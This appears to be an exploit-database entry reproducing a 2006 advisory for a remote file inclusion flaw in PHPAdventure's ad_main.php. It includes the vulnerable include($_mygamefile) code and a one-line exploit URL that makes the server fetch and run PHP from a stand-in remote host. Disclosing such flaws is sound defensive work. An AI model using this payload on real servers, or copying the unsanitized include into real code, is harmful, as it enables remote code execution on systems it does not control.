header-logo
Suggest Exploit
vendor:
PHPAdventure
by:
D.O.M TEAM
8,8
CVSS
HIGH
RFI
94
CWE
Product Name: PHPAdventure
Affected Version From: All versions of PHPAdventure
Affected Version To: All versions of PHPAdventure
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

HER0

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the '_mygamefile' parameter to '/ad_main.php' script. A remote attacker can send a specially crafted HTTP request with malicious code in the '_mygamefile' parameter, which will be included and executed by the vulnerable script. This can be exploited to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contac:16.her0@gmail.com
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
www.domteam.info

greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************

# milw0rm.com [2006-11-07]

Navigation

Suggest Exploit

Services By CQR